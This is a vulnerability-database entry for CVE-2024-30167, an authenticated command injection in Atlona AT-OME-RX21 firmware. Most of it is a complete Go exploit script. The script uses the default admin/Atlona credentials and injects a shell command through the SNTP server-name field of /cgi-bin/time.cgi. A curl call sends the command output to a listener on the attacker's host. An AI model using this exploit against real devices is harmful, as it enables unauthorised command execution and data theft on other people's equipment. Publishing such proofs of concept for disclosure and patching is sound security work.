📄 Atlona AT-OME-RX21 Authenticated Command Injection

🗓️ 05 May 2026 00:00:00Reported by RIZZZIOMType

Authenticated command injection in Atlona AT-OME-RX21 firmware up to 1.5.1 enables command execution.

Reporter	Title	Published	Views	Family All 11
ATTACKERKB	CVE-2024-30167	8 May 202600:00	–	attackerkb
Circl	CVE-2024-30167	27 Dec 202515:00	–	circl
CNNVD	Atlona ATOMERX21 命令注入漏洞	29 Apr 202600:00	–	cnnvd
CVE	CVE-2024-30167	8 May 202600:00	–	cve
Cvelist	CVE-2024-30167	8 May 202600:00	–	cvelist
Exploit DB	Atlona ATOMERX21 - Authenticated Command Injection	29 Apr 202600:00	–	exploitdb
EUVD	EUVD-2024-28103	8 May 202606:32	–	euvd
NVD	CVE-2024-30167	8 May 202606:16	–	nvd
Positive Technologies	PT-2026-38667	8 May 202600:00	–	ptsecurity
RedhatCVE	CVE-2024-30167	5 Jun 202618:49	–	redhatcve

// Exploit Title: Atlona AT-OME-RX21 Authenticated Command Injection
    // Google Dork: N/A
    // Date: 2025-12-28
    // Exploit Author: RIZZZIOM
    // Vendor Homepage: https://atlona.com
    // Software Link: https://atlona.com/product/at-ome-rx21/
    // Version: Firmware <= 1.5.1
    // Tested on: AT-OME-RX21 Embedded Firmware (1.5.0, 1.5.1)
    // CVE : CVE-2024-30167
    // Usage: go run main.go -t <target_uri> -u <username> -p <password> -l <lhost> -P <lport> -c <command>
    package main
    
    import (
    	"bytes"
    	"context"
    	"encoding/base64"
    	"flag"
    	"fmt"
    	"io"
    	"net/http"
    	"os"
    	"os/signal"
    	"strings"
    	"syscall"
    	"time"
    )
    
    func main() {
    	banner := `
    		                                                                                  
                                                                                      
    ▄█████ ██  ██ ██████    ████▄  ▄██▄ ████▄ ██  ██    ████▄  ▄██▄ ▄██ ▄██▀▀▀ ██████ 
    ██     ██▄▄██ ██▄▄   ▄▄▄ ▄██▀ ██  ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██  ██ ██ ██▄▄▄    ▄██▀ 
    ▀█████  ▀██▀  ██▄▄▄▄    ███▄▄  ▀██▀ ███▄▄     ██    ▄▄▄█▀  ▀██▀  ██ ▀█▄▄█▀  ██▀   
                        
    			PoC by: github.com/RIZZZIOM
    	`
    	fmt.Println(banner)
    
    	target := flag.String("t", "", "Target URL (e.g: http://example.com)")
    	username := flag.String("u", "admin", "Username for authentication")
    	password := flag.String("p", "Atlona", "Password for authentication")
    	lport := flag.String("P", "4444", "listening port for command output")
    	lhost := flag.String("l", "", "listening host for command output")
    	command := flag.String("c", "", "Command to execute on the target")
    
    	flag.Parse()
    	if *target == "" || *lhost == "" || *command == "" {
    		fmt.Println("ERROR: Missing required parameters")
    		flag.PrintDefaults()
    		os.Exit(1)
    	}
    
    	url := strings.TrimRight(*target, "/") + "/cgi-bin/time.cgi"
    	listener := *lhost + ":" + *lport
    
    	// Buffered channel to prevent goroutine blocking if receiver exits early
    	responseChan := make(chan struct{}, 1)
    
    	// Create context for graceful shutdown coordination
    	ctx, cancel := context.WithCancel(context.Background())
    	defer cancel()
    
    	// Start HTTP server and get reference for shutdown
    	server := httpServe(listener, responseChan, ctx)
    
    	executeCommand(url, *username, *password, listener, *command)
    
    	sigChan := make(chan os.Signal, 1)
    	signal.Notify(sigChan, syscall.SIGINT, syscall.SIGTERM)
    
    	// Timeout to prevent indefinite waiting
    	responseTimeout := time.NewTimer(30 * time.Second)
    	defer responseTimeout.Stop()
    
    	select {
    	case <-responseChan:
    		time.Sleep(1 * time.Second)
    	case <-sigChan:
    		fmt.Printf("\n===Shutting Down===\n")
    	case <-responseTimeout.C:
    		fmt.Println("\n===Response Timeout - No response received===")
    	}
    
    	// Graceful server shutdown
    	cancel() // Signal context cancellation
    	shutdownCtx, shutdownCancel := context.WithTimeout(context.Background(), 5*time.Second)
    	defer shutdownCancel()
    
    	if err := server.Shutdown(shutdownCtx); err != nil {
    		fmt.Printf("Server shutdown error: %v\n", err)
    	}
    }
    
    func executeCommand(url, username, password, listener, command string) {
    	// this func sends the commands to the target
    	payload := fmt.Sprintf(`{"syncSntpTime":{"serverName":"time.google.com; curl -X POST --data \"$(%s)\" %s"}}`, command, listener)
    	auth := base64.StdEncoding.EncodeToString([]byte(username + ":" + password))
    	req, err := http.NewRequest("POST", url, bytes.NewBuffer([]byte(payload)))
    	if err != nil {
    		panic(err)
    	}
    	req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0) Firefox/143.0")
    	req.Header.Set("Content-Type", "application/json")
    	req.Header.Set("Authorization", "Basic "+auth)
    	req.Header.Set("X-Requested-With", "XMLHttpRequest")
    
    	client := &http.Client{
    		Timeout: 15 * time.Second,
    	}
    
    	resp, err := client.Do(req)
    	if err != nil {
    		fmt.Printf("ERROR: Request failed: %v\n", err)
    		os.Exit(1)
    	}
    	defer resp.Body.Close()
    
    	switch resp.StatusCode {
    	case 200:
    		fmt.Println("Command Injection Successful")
    	case 401, 403:
    		fmt.Printf("ERROR: Authentication Failed (HTTP %d)\n", resp.StatusCode)
    	case 404:
    		fmt.Printf("ERROR: Target Endpoint Not Found.\n")
    	default:
    		fmt.Printf("ERROR: Unexpected Response (HTTP %d)\n", resp.StatusCode)
    		body, _ := io.ReadAll(resp.Body)
    		if len(body) > 0 {
    			fmt.Printf("Response Body: %s\n", string(body))
    		}
    		os.Exit(1)
    	}
    }
    
    func getResponse(r *http.Request, responseChan chan struct{}) {
    	// this function serves and http server and collects response
    	if r.Method != http.MethodPost {
    		fmt.Printf("Received non-POST Request(%s)\n", r.Method)
    		return
    	}
    	defer r.Body.Close()
    	fmt.Println("\n=====Received Response=====")
    
    	body, err := io.ReadAll(r.Body)
    	if err != nil {
    		fmt.Printf("Failed To Read Response Body: %v\n", err)
    		return
    	}
    	fmt.Println(string(body))
    
    	// Non-blocking send to prevent goroutine deadlock
    	select {
    	case responseChan <- struct{}{}:
    	default:
    	}
    }
    
    func httpServe(listener string, responseChan chan struct{}, ctx context.Context) *http.Server {
    	// this function gets the command injection response from the custom header
    	mux := http.NewServeMux()
    	mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
    		getResponse(r, responseChan)
    		w.WriteHeader(http.StatusNoContent)
    	})
    
    	server := &http.Server{
    		Addr:           listener,
    		Handler:        mux,
    		MaxHeaderBytes: 20 * 1024 * 1024,
    		ReadTimeout:    30 * time.Second,
    		WriteTimeout:   30 * time.Second,
    		IdleTimeout:    60 * time.Second,
    	}
    
    	fmt.Printf("Listening on %s for response...\n", listener)
    
    	go func() {
    		if err := server.ListenAndServe(); err != nil && err != http.ErrServerClosed {
    			fmt.Printf("ERROR: Server error: %v\n", err)
    		}
    	}()
    
    	return server
    }

05 May 2026 00:00Current

5.8Medium risk

Vulners AI Score5.8

CVSS 3.16.3

EPSS0.01143

SSVC